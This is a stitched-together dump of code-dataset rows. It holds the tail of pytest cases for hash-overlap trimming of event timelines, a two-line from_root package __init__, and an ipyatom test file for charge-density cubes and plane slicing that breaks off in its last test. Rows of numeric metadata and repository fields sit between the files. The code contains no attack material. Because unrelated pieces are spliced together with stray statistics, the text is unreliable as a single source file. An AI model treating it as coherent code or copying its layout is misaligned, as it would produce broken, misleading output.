-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
5733043846273024389,
-1646174301922479662,
8445266879889198574,
8936979800905005683,
5073970690446166680,
4002889492044046295,
5623320347751645624,
-3587251677524125944,
],
22,
),
(list(range(30)), 0),
(list(range(60)), 0),
(list(range(30)) + list(range(16, 46)), 14),
(list(range(30)) + list(range(30)), 30),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
],
13,
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
],
11,
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
28,
28,
28,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
),
]
@pytest.mark.parsing
@pytest.mark.parametrize(
"hashes, expected_num_overlapping_events", OVERLAP_HASH_TEST_CASES
)
def test_find_overlap_last_page_index(
hashes: List[int], expected_num_overlapping_events: int
):
num_overlapping_events = find_overlap_last_page_index(hashes)
assert num_overlapping_events == expected_num_overlapping_events
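# Each case is (hashes, num_overlapping_events, trimmed_hashes): given the
# combined hash list and the overlap count, trimming is expected to drop the
# duplicated events so the stitched timeline contains each event only once.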
TRIM_OVERLAP_TEST_CASES = [
([], 0, []),
# test case taken from
(
[
4898569955834637889,
-4414489284896555474,
-5683575663596673397,
-6727287813583471907,
6091366772103832389,
8372541563657396237,
-5998200551159387251,
-8350152916269273221,
8054318264316763706,
-7773028656705170379,
4857987452609043078,
2426212828938566709,
-9195684035214585113,
6262737924542373709,
-4462780260128884117,
4966964054850516428,
6310410009357200445,
-743246492690333081,
-7047028544218896895,
-5621347802322359969,
-6448705873843666124,
8297621253914253337,
1026440669783540158,
1473315671454268467,
-4555721104568928804,
7319079772568642287,
-6272454861391088382,
1202541922402720900,
-4791185849326570354,
-8648060616625656676,
6192524553168898821,
1095959189604413276,
-2487854583837734527,
6214444077178414495,
-6743699474363429090,
-7907129591594689933,
-3200233558801643978,
5548470840566651052,
-515246112565934050,
5552309446946592289,
3276521516792218876,
-6993507546958920025,
4237899588761139910,
8614420660470844145,
-3637992246739640041,
-3317205397768809852,
-6984375733142720586,
684784715920252680,
6464085402063056967,
-110423439490813070,
-9206787334010066531,
-8965393725341744810,
4795204757292903171,
-4853211488406126821,
-2809935517467852731,
-7701016839766834705,
-1956520985913015316,
-8856221326385893001,
-2606966940955522812,
-1595404463426174141,
1029605680750905825,
8482082510959136174,
-3384240464622680325,
-7013454046217635141,
2230081605807153069,
-1390917854947158567,
8341402324383349642,
3192202567968357689,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
5733043846273024389,
-1646174301922479662,
8445266879889198574,
8936979800905005683,
5073970690446166680,
4002889492044046295,
5623320347751645624,
-3587251677524125944,
],
22,
[
4898569955834637889,
-4414489284896555474,
-5683575663596673397,
-6727287813583471907,
6091366772103832389,
8372541563657396237,
-5998200551159387251,
-8350152916269273221,
8054318264316763706,
-7773028656705170379,
4857987452609043078,
2426212828938566709,
-9195684035214585113,
6262737924542373709,
-4462780260128884117,
4966964054850516428,
6310410009357200445,
-743246492690333081,
-7047028544218896895,
-5621347802322359969,
-6448705873843666124,
8297621253914253337,
1026440669783540158,
1473315671454268467,
-4555721104568928804,
7319079772568642287,
-6272454861391088382,
1202541922402720900,
-4791185849326570354,
-8648060616625656676,
6192524553168898821,
1095959189604413276,
-2487854583837734527,
6214444077178414495,
-6743699474363429090,
-7907129591594689933,
-3200233558801643978,
5548470840566651052,
-515246112565934050,
5552309446946592289,
3276521516792218876,
-6993507546958920025,
4237899588761139910,
8614420660470844145,
-3637992246739640041,
-3317205397768809852,
-6984375733142720586,
684784715920252680,
6464085402063056967,
-110423439490813070,
-9206787334010066531,
-8965393725341744810,
4795204757292903171,
-4853211488406126821,
-2809935517467852731,
-7701016839766834705,
-1956520985913015316,
-8856221326385893001,
-2606966940955522812,
-1595404463426174141,
1029605680750905825,
8482082510959136174,
-3384240464622680325,
-7013454046217635141,
2230081605807153069,
-1390917854947158567,
8341402324383349642,
3192202567968357689,
-436262288112376921,
-4565100090044904977,
-1731295948189016240,
3192202567968357689,
-436262288112376921,
-1032990216138025315,
2693125543119600033,
7368559427308120107,
5974161061667067404,
3270713386344843245,
-6153343156143776805,
-8048356150070767585,
8268265106128128142,
9045990381001798749,
-2197261469458339085,
-3980135260768034233,
-2248385609438602268,
-7941215634526514224,
-228472052116432376,
4611042632143558440,
3304821425538213324,
-2711734606293041948,
5733043846273024389,
-1646174301922479662,
8445266879889198574,
8936979800905005683,
5073970690446166680,
4002889492044046295,
5623320347751645624,
-3587251677524125944,
],
),
(list(range(30)), 0, list(range(30))),
(list(range(60)), 0, list(range(60))),
(list(range(30)) + list(range(16, 46)), 14, list(range(46))),
(list(range(30)) + list(range(30)), 30, list(range(30))),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
],
13,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
],
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
],
11,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
],
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
),
(
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
28,
28,
28,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
2,
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
17,
18,
21,
22,
23,
24,
25,
26,
27,
28,
28,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
],
),
]
@pytest.mark.parsing
@pytest.mark.parametrize(
"hashes, num_overlapping_events, trimmed_hashes", TRIM_OVERLAP_TEST_CASES
)
def test_trim_overlapped_list(hashes, num_overlapping_events, trimmed_hashes):
assert trimmed_hashes == trim_overlapped_list(hashes, num_overlapping_events)
| 28.083352
| 86
| 0.323521
| 14,870
| 254,716
| 5.532482
| 0.032011
| 0.060096
| 0.093195
| 0.132263
| 0.931893
| 0.8955
| 0.860444
| 0.810169
| 0.776183
| 0.735815
| 0
| 0.134263
| 0.574196
| 254,716
| 9,069
| 87
| 28.086448
| 0.624254
| 0.000161
| 0
| 0.867293
| 0
| 0
| 0.086609
| 0.000298
| 0
| 0
| 0
| 0
| 0.001547
| 1
| 0.000331
| false
| 0
| 0.001215
| 0
| 0.001547
| 0.005967
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17424bb4fb5d98583bbc38888af5b4fd94f0888f
| 93
|
py
|
Python
|
from_root/utils/__init__.py
|
EduardKononov/from-root
|
eb80e93a31861217162705a4250a5f73c3821cbc
|
[
"MIT"
] | 7
|
2021-03-26T13:11:48.000Z
|
2022-02-15T10:20:43.000Z
|
from_root/utils/__init__.py
|
EduardKononov/from-root
|
eb80e93a31861217162705a4250a5f73c3821cbc
|
[
"MIT"
] | null | null | null |
from_root/utils/__init__.py
|
EduardKononov/from-root
|
eb80e93a31861217162705a4250a5f73c3821cbc
|
[
"MIT"
] | 1
|
2021-07-20T12:56:48.000Z
|
2021-07-20T12:56:48.000Z
|
from from_root.utils.all_dirs_exists import *
from from_root.utils.get_project_root import *
| 31
| 46
| 0.849462
| 16
| 93
| 4.5625
| 0.5625
| 0.219178
| 0.328767
| 0.465753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086022
| 93
| 2
| 47
| 46.5
| 0.858824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
177cac7a5f7d726ae42917284e0047848e8c02a3
| 18,305
|
py
|
Python
|
ipyatom/test_repeat_density.py
|
chrisjsewell/ipyatom
|
a4cc9e1c7aecaf18eaa510bba2adb4ca3da63a2f
|
[
"MIT"
] | null | null | null |
ipyatom/test_repeat_density.py
|
chrisjsewell/ipyatom
|
a4cc9e1c7aecaf18eaa510bba2adb4ca3da63a2f
|
[
"MIT"
] | null | null | null |
ipyatom/test_repeat_density.py
|
chrisjsewell/ipyatom
|
a4cc9e1c7aecaf18eaa510bba2adb4ca3da63a2f
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from ase.atoms import Atoms
from ase.build import bulk as ase_bulk
from ejplugins.utils import load_test_file
from ipyatom.repeat_density import ejdata_to_dict, cubesliceplane, atoms_to_rdensity
from ipyatom.transforms import add_repeat, apply_transforms, add_resize, add_slice
from ipyatom.validation import process_vstruct
from jsonextended import plugins
from jsonextended.encoders.ndarray import Encode_NDArray
@pytest.fixture("function")
def quantum_espresso():
with plugins.plugins_context([Encode_NDArray]):
ejdata = load_test_file("scf.qe.charge.json")
# edict.pprint(data)
return ejdata
@pytest.fixture("function")
def crystal14():
with plugins.plugins_context([Encode_NDArray]):
ejdata = load_test_file("crystal.ech3_dat.prop3d.json")
# edict.pprint(data)
return ejdata
# a better way to do this is in the works: https://docs.pytest.org/en/latest/proposals/parametrize_with_fixtures.html
@pytest.fixture(params=['quantum_espresso', 'crystal14'])
def ejdata(request):
return request.getfuncargvalue(request.param)
def test_ejdata_to_dict(ejdata):
dct = ejdata_to_dict(ejdata, retrieve_atoms=False)
assert "elements" in dct
assert len(dct["elements"]) > 0
process_vstruct(dct, eltypes=["repeat_density"])
def test_ejdata_to_dict_with_atoms(quantum_espresso):
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=True)
assert "elements" in dct
assert len(dct["elements"]) == 2
process_vstruct(dct, eltypes=["repeat_density", "repeat_cell"])
def test_transforms_repeat(quantum_espresso):
""" see doctests for more specific tests
"""
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=False)
assert dct["elements"][0]["dcube"].shape == (45, 45, 45)
add_repeat(dct, (2, 1, 1))
dct = apply_transforms(dct)
assert dct["elements"][0]["dcube"].shape == (135, 90, 90)
def test_transforms_resize(quantum_espresso):
""" see doctests for more specific tests
"""
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=False)
assert dct["elements"][0]["dcube"].shape == (45, 45, 45)
add_resize(dct, .49)
dct = apply_transforms(dct)
assert dct["elements"][0]["dcube"].shape == (22, 22, 22)
def test_transforms_slice(quantum_espresso):
""" see doctests for more specific tests
"""
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=False)
num_nan_init = np.isnan(dct["elements"][0]["dcube"]).sum()
add_slice(dct, [1, 0, 0], ubound=1)
dct = apply_transforms(dct)
num_nan_final = np.isnan(dct["elements"][0]["dcube"]).sum()
assert num_nan_final > num_nan_init
def test_cubesliceplane_tr_only():
""" test for a plane which only requires translation
"""
ccube = np.array([
[[1., 2., 20.],
[1., 5., 20.],
[1., 8., 20.]],
[[1., 3., 20.],
[1., 6., 20.],
[1., 9., 20.]],
[[1., 4., 20.],
[1., 7., 20.],
[1., 10., 20.]]])
cbounds = (0., 1., 0., 1., 0., 1.)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0.5, 0.5, .5), (0., 0., 1.), cell_size=.25,
alter_bbox=(.0001, 0., .0001, 0.))
np.testing.assert_allclose(np.array(corners).round(2),
[[-0.0, -0.0, 0.5], [1.0, -0.0, 0.5], [-0.0, 1.0, 0.5], [1.0, 1.0, 0.5]])
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.5, -0.5], [0.5, -0.5], [-0.5, 0.5], [0.5, 0.5]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.5, -0.5, 2.0], [-0.5, -0.25, 3.5], [-0.5, 0.0, 5.0], [-0.5, 0.25, 6.5],
[-0.25, -0.5, 2.5], [-0.25, -0.25, 4.0], [-0.25, 0.0, 5.5], [-0.25, 0.25, 7.0],
[0.0, -0.5, 3.0], [0.0, -0.25, 4.5], [0.0, 0.0, 6.0], [0.0, 0.25, 7.5],
[0.25, -0.5, 3.5], [0.25, -0.25, 5.0], [0.25, 0.0, 6.5], [0.25, 0.25, 8.0]]
))
def test_cubesliceplane_rot_only():
""" test for a plane which only requires rotation
"""
ccube = np.array([
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]]])
cbounds = (-0.5, 0.5, -0.5, 0.5, -0.5, 0.5)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0., 0., 0.), (1., 1., 0.), cell_size=.25,
alter_bbox=(.001, 0., .001, 0.))
np.testing.assert_allclose(np.array(corners).round(2),
[[0.5, -0.5, -0.5], [-0.5, 0.5, -0.5], [0.5, -0.5, 0.5], [-0.5, 0.5, 0.5]])
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.71, -0.5], [0.71, -0.5], [-0.71, 0.5], [0.71, 0.5]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.71, -0.5, 3.99], [-0.71, -0.25, 2.99], [-0.71, 0.0, 2.0], [-0.71, 0.25, 2.5],
[-0.46, -0.5, 2.93], [-0.46, -0.25, 2.47], [-0.46, 0.0, 2.0], [-0.46, 0.25, 2.5],
[-0.21, -0.5, 1.87], [-0.21, -0.25, 1.94], [-0.21, 0.0, 2.0], [-0.21, 0.25, 2.5],
[0.04, -0.5, 1.0], [0.04, -0.25, 1.5], [0.04, 0.0, 2.0], [0.04, 0.25, 2.5],
[0.29, -0.5, 1.0], [0.29, -0.25, 1.5], [0.29, 0.0, 2.0], [0.29, 0.25, 2.5],
[0.54, -0.5, 1.0], [0.54, -0.25, 1.5], [0.54, 0.0, 2.0], [0.54, 0.25, 2.5]]
))
def test_cubesliceplane_tr_and_rot():
""" test for a plane which requires both a translation and rotation
"""
ccube = np.array([
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]]])
cbounds = (0., 1., 0., 1., 0., 1.)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0.5, 0.5, .5), (1., 1., 0.), cell_size=.25,
alter_bbox=(.001, 0., .001, 0.))
np.testing.assert_allclose(np.array(corners).round(2),
[[1., 0., 0.], [-0., 1., 0.], [1., 0., 1.], [-0., 1., 1.]])
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.71, -0.5], [0.71, -0.5], [-0.71, 0.5], [0.71, 0.5]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.71, -0.5, 3.99], [-0.71, -0.25, 2.99], [-0.71, 0.0, 2.0], [-0.71, 0.25, 2.5],
[-0.46, -0.5, 2.93], [-0.46, -0.25, 2.47], [-0.46, 0.0, 2.0], [-0.46, 0.25, 2.5],
[-0.21, -0.5, 1.87], [-0.21, -0.25, 1.94], [-0.21, 0.0, 2.0], [-0.21, 0.25, 2.5],
[0.04, -0.5, 1.0], [0.04, -0.25, 1.5], [0.04, 0.0, 2.0], [0.04, 0.25, 2.5],
[0.29, -0.5, 1.0], [0.29, -0.25, 1.5], [0.29, 0.0, 2.0], [0.29, 0.25, 2.5],
[0.54, -0.5, 1.0], [0.54, -0.25, 1.5], [0.54, 0.0, 2.0], [0.54, 0.25, 2.5]]
))
def test_cubesliceplane_tr_and_rot_offset_scentre():
""" test for a plane which requires both a translation and rotation with an scentre which is not in centre of carray
"""
ccube = np.array([
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]]])
cbounds = (0., 1., 0., 1., 0., 1.)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0.5, 0.5, 0.3), (1., 1., 0.), cell_size=.25,
alter_bbox=(.001, 0., .001, 0.))
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.71, -0.5], [0.71, -0.5], [-0.71, 0.5], [0.71, 0.5]])
np.testing.assert_allclose(np.array(corners).round(2),
[[1., 0., 0.], [-0., 1., 0.], [1., 0., 1.], [-0., 1., 1.]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.71, -0.5, 3.99], [-0.71, -0.25, 2.99], [-0.71, 0.0, 2.0], [-0.71, 0.25, 2.5],
[-0.46, -0.5, 2.93], [-0.46, -0.25, 2.47], [-0.46, 0.0, 2.0], [-0.46, 0.25, 2.5],
[-0.21, -0.5, 1.87], [-0.21, -0.25, 1.94], [-0.21, 0.0, 2.0], [-0.21, 0.25, 2.5],
[0.04, -0.5, 1.0], [0.04, -0.25, 1.5], [0.04, 0.0, 2.0], [0.04, 0.25, 2.5],
[0.29, -0.5, 1.0], [0.29, -0.25, 1.5], [0.29, 0.0, 2.0], [0.29, 0.25, 2.5],
[0.54, -0.5, 1.0], [0.54, -0.25, 1.5], [0.54, 0.0, 2.0], [0.54, 0.25, 2.5]]
))
def test_atoms_to_rdensity_central():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.5, 0.5, 0.5]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_xoffset():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.75, 0.5, 0.5]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_yoffset():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.5, 0.75, 0.5]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_zoffset():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.5, 0.5, 0.75]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_2atoms():
atoms = Atoms(symbols=["Fe", "S"], scaled_positions=[[0.25, 0.25, 0.25], [0.75, 0.75, 0.75]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}, "S": {"radius": .5, "color_fill": "blue"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1, ('S', 'blue'): 2}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
